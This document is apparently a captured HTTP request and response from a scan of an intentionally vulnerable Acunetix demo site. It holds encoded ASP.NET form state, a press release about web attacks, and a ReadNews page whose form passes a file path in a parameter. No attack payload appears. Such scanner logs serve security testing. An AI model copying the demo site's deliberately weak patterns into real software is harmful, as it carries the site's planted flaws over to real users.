CAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ944e4UqgWJpySuZGYD9y7m9ZXo%2FQ%3D%3DResponse Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:20 GMT Content-Length: 30486Response body (30486 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" 